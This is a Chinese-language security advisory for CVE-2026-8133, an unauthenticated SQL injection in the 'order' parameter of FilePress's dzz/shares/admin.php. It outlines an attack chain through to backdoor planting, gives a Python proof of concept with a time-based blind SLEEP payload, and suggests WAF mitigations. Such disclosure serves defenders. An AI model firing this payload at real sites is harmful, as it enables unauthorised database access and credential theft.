CVE-2026-8133: zyx0814 FilePress SQL注入漏洞

漏洞信息

漏洞编号

CVE-2026-8133

漏洞类型

SQL注入

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

zyx0814 FilePress

漏洞概述

zyx0814 FilePress 2.2.0及之前版本中的 Shares Filelist API 组件存在安全漏洞。该漏洞位于文件 dzz/shares/admin.php 中，由于对 'order' 参数的处理不当，导致攻击者可远程发起 SQL 注入攻击。此漏洞无需身份认证即可利用，可能导致数据库敏感信息泄露。厂商已发布修复补丁，建议受影响用户尽快更新。

技术细节

该漏洞源于 zyx0814 FilePress 组件 Shares Filelist API 的 dzz/shares/admin.php 文件未正确过滤用户输入。具体而言，程序直接将用户可控的 'order' 参数拼接到 SQL 查询语句中，而未进行有效的类型检查或转义。根据 CVSS 3.1 评分向量（AV:N/AC:L/PR:N/UI:N/S:U），攻击者无需任何权限且无需用户交互，即可通过网络向受影响端点发送特制数据包。利用此漏洞，攻击者可以执行恶意的 SQL 命令，从而窃取数据库中的用户凭证、配置信息等敏感数据，或对数据进行篡改。尽管利用复杂度较低，但其影响范围涉及机密性、完整性和可用性，属于高危漏洞。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描网络，识别出运行 zyx0814 FilePress 2.2.0 及以下版本的目标站点。

STEP 2

2. 漏洞探测

攻击者向 dzz/shares/admin.php 接口发送包含恶意 SQL 语句的 'order' 参数，测试是否存在注入点。

STEP 3

3. 恶意利用

确认漏洞存在后，攻击者利用 SQL 注入技术提取数据库结构及敏感数据（如管理员哈希、用户信息）。

STEP 4

4. 权限提升

利用获取的管理员凭证登录后台，进一步控制服务器或植入后门。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC for CVE-2026-8133
# Target: zyx0814 FilePress <= 2.2.0
# Endpoint: dzz/shares/admin.php

def exploit_sqli(target_url):
    """
    This script attempts to detect SQL injection in the 'order' parameter.
    """
    full_url = f"{target_url}/dzz/shares/admin.php"
    
    # Payload using time-based blind SQL injection technique
    # Adjust the sleep time based on network latency
    payload = {
        "order": "1 AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)"
    }
    
    try:
        print(f"[+] Sending request to {full_url}...")
        response = requests.get(full_url, params=payload, timeout=10)
        
        if response.elapsed.total_seconds() >= 5:
            print("[!] Potential SQL Injection vulnerability detected (Time-based).")
        else:
            print("[-] Vulnerability not detected or patched.")
            
    except requests.exceptions.RequestException as e:
        print(f"[-] Error occurred: {e}")

if __name__ == "__main__":
    target = "http://example.com" # Replace with actual target
    exploit_sqli(target)

影响范围

zyx0814 FilePress <= 2.2.0

防御指南

临时缓解措施

若无法立即更新，建议在网络边界部署 WAF，针对 'dzz/shares/admin.php' 路径的请求拦截包含 SQL 关键字（如 SELECT, UNION, SLEEP 等）的流量，或在应用层通过 Nginx/Apache 规则暂时禁用该接口的访问。